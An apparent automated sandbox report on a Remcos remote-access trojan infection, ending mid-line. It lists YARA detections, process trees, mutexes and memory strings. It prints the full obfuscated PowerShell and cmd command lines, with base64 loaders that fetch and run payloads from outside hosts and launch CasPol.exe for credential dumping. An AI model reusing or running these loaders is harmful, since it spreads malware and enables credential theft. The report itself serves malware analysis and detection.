                    Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@24/19@4/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A64F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BD4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\simplegreatfeatureswithnicespeakingthingsentirelifegoingon[1].tiffJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-B3IX49
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1gdfremy.u5z.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: CasPol.exe, CasPol.exe, 0000000E.00000002.2080096003.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: CasPol.exe, 0000000D.00000002.2096481680.00000000030AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: CasPol.exe, CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: clearentirethingwithbestnoticetheeverythinggooodfrome.htaVirustotal: Detection: 27%
                    Source: clearentirethingwithbestnoticetheeverythinggooodfrome.htaReversingLabs: Detection: 13%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\clearentirethingwithbestnoticetheeverythinggooodfrome.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38A1.tmp" "c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qiupnqamsvkxb"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\skzzoilfgdcclexm"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgIC